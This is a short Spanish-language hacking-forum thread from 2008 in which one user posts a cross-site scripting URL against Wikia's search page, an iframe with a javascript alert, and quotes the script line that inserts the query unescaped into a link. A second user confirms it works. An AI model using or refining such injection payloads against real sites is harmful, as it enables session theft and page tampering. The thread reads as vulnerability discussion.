elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Xss en Wikia search?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Xss en Wikia search?  (Leído 2,249 veces)
Thor


Desconectado Desconectado

Mensajes: 1.177


Ver Perfil
Xss en Wikia search?
« en: 8 Enero 2008, 15:04 pm »

http://re.search.wikia.com/search#%22%3Elink%3C/a%3E%3CIFRAME%20SRC=%22javascript:alert('XSS');%22%3E%3C/IFRAME%3E

El problema creo que está por aquí:
http://re.search.wikia.com/search-a1.js
Código:
$("sr-mini-content").innerHTML = 'We do not have a mini article about "'+q.escapeHTML()+'".  Improve the search results for everyone by <a href="http://search.wikia.com/index.php?title=Mini:'+q+'&action=edit">starting</a> this article!';

¿Se podría hacer sin lo de iframe? Directamente no he podido :(
En línea

NewLog


Desconectado Desconectado

Mensajes: 329



Ver Perfil WWW
Re: Xss en Wikia search?
« Respuesta #1 en: 9 Enero 2008, 23:20 pm »

Qué grande es No-Script... hasta detecta los Xss...

Funciona.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Proyecto] Wikia local / offline
Foro Libre
z3nth10n 2 1,312 Último mensaje 13 Octubre 2013, 12:17 pm
por z3nth10n
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines